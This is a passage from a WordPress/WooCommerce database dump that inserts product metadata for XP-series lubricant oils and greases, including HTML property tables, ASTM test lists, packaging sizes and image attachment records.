center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11666, 1014, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11667, 1014, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11668, 1014, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11669, 1014, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11670, 1014, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11671, 1014, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11672, 1014, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11673, 1014, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11674, 1014, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11675, 1014, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11676, 1014, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11677, 1014, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11678, 1014, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11679, 1014, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11680, 1014, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11681, 1014, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11682, 1014, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11683, 1014, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11684, 1014, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11685, 1014, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11686, 1014, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11687, 1014, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11688, 1014, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11689, 1014, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11690, 1014, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11691, 1014, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11692, 1014, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11693, 1014, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11694, 1014, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11695, 1014, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (11724, 1014, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11725, 1014, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11726, 1015, '_edit_lock', '1474297329:2'); 
INSERT INTO `wp_postmeta` VALUES (11727, 1015, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (11728, 1015, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11729, 1015, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11730, 1015, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11731, 1015, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11732, 1015, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11733, 1015, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11734, 1015, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11735, 1015, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11736, 1015, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11737, 1015, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11738, 1015, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11739, 1015, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11740, 1015, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11741, 1015, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11742, 1015, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11743, 1015, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11744, 1015, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11745, 1015, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11746, 1015, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11747, 1015, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11748, 1015, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11749, 1015, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11750, 1015, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11751, 1015, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11752, 1015, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11753, 1015, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11754, 1015, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11755, 1015, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11756, 1015, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11757, 1015, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11758, 1015, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11759, 1015, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11760, 1015, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (11789, 1015, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11790, 1015, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11791, 1016, '_edit_lock', '1474297235:2'); 
INSERT INTO `wp_postmeta` VALUES (11792, 1016, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (11793, 1016, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11794, 1016, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11795, 1016, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11796, 1016, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11797, 1016, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11798, 1016, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11799, 1016, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11800, 1016, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11801, 1016, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11802, 1016, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11803, 1016, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11804, 1016, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11805, 1016, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11806, 1016, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11807, 1016, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11808, 1016, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11809, 1016, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11810, 1016, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11811, 1016, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11812, 1016, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11813, 1016, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11814, 1016, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11815, 1016, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11816, 1016, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11817, 1016, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11818, 1016, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11819, 1016, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11820, 1016, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11821, 1016, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11822, 1016, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11823, 1016, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11824, 1016, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11825, 1016, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (11854, 1016, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11855, 1016, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11856, 1002, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (11857, 1017, '_wp_attached_file', '2016/08/shutterstock_438391567.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11858, 1018, '_wp_attached_file', '2016/08/EPON-electrical-laminate.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11859, 1018, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2051;s:6:"height";i:2069;s:4:"file";s:36:"2016/08/EPON-electrical-laminate.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-793x800.jpg";s:5:"width";i:793;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-768x775.jpg";s:5:"width";i:768;s:6:"height";i:775;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"EPON-electrical-laminate-1586x1600.jpg";s:5:"width";i:1586;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"EPON